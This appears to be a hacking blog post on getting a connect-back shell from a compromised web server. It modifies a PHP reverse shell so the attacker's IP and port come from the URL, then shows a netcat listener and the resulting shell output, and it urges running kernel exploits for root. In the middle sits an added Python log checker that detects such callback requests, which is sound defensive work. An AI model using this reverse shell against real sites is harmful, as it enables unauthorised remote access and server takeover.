If you are attacking a website and have successfully compromised it, you need to connect back from the web server to your local machine for the next steps. I have one simple PHP script for that: you only enter your IP address and port in the URL and it connects back. For example:
http://192.168.56.101/rs.php?ip=192.168.56.1&port=1234
Here 192.168.56.101 is the target IP, rs.php is the script, and the variables ip and port are the address and port of your local machine.
The script is below.
The original script asks you to edit the variables ip and port by hand.
Script before the change:
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = '1234'; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
The script after the change (ip and port are now taken from the query string):
$VERSION = "1.0";
$ip = $_GET['ip']; // CHANGED
$port = $_GET['port']; // CHANGED
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
You can download the full script here.
Next..
After making the change, open a terminal on your local machine and use netcat to listen. Example:
root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
This opens a listener on port 1234.
Go to your browser and run the script on the target web server, entering your IP address and the destination port.
If it connects you will get a message like "connection successfully".
Look at your terminal and you will see something like this:
root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37140
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
20:47:47 up 2:12, 6 users, load average: 0.09, 0.07, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 18:36 2:11m 0.11s 0.00s /bin/bash /usr/
root pts/0 :0 18:36 2:11m 0.00s 1.64s kdeinit4: kded4
root pts/2 :0.0 18:37 2:10m 4.28s 4.23s wvdial smart
root pts/3 :0.0 18:38 1:10m 1.03s 1.02s elinks
root pts/1 :0.0 20:32 15:13 0.01s 0.01s /bin/bash
root pts/6 :0.0 20:41 13.00s 0.03s 0.00s nc -l -n -v -p
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: no job control in this shell
sh-4.1$
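From the defender's side, the request shape shown at the top of this post (a PHP file called with an IPv4 address and a port in the query string, usually from the same host the callback goes to) is easy to pick out of web server logs. The following Python checker is an added example, not part of the original post or the script it describes; the Apache combined-format log lines it scans are constructed, and the parameter names are not assumed (any parameter carrying an IPv4 address or a port number counts).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Oct/2011:20:47:40 +1200] "GET /rs.php?ip=192.168.56.1&port=1234 HTTP/1.1" 200 25 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Oct/2011:20:48:01 +1200] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2011:20:49:13 +1200] "POST /upload.php HTTP/1.1" 200 310 "-" "curl/7.21"
10.0.0.7 - - [10/Oct/2011:20:49:30 +1200] "GET /images/x.php?host=10.0.0.7&p=4444 HTTP/1.1" 200 25 "-" "curl/7.21"
"""

# client, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def looks_like_port(value):
    """True for a decimal string in the TCP port range."""
    return value.isdigit() and 1 <= int(value) <= 65535


def find_callback_requests(log_text):
    """Return one dict per request whose query string carries both an IPv4
    address and a port number, the shape of a parameterised connect-back."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        values = [v for vals in parse_qs(parts.query).values() for v in vals]
        ips = [v for v in values if IPV4_RE.match(v)]
        ports = [v for v in values if looks_like_port(v)]
        if ips and ports:
            hits.append({
                'ts': m.group('ts'),
                'client': m.group('client'),
                'path': parts.path,
                'callback_ip': ips[0],
                'callback_port': ports[0],
                # strongest signal: the callback address is the requesting client itself
                'callback_is_client': ips[0] == m.group('client'),
            })
    return hits


if __name__ == '__main__':
    for hit in find_callback_requests(SAMPLE_LOG):
        print(hit)
```

A hit where callback_is_client is true and the status is 200 is worth an immediate look at the named PHP file on disk and at outbound connections from the web server user.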
Run your exploit to get root access..
For more information about kernel exploits, read my older post get-root-access-on-server.
Visit Exploit-db for more exploits..
Thanks for reading... :D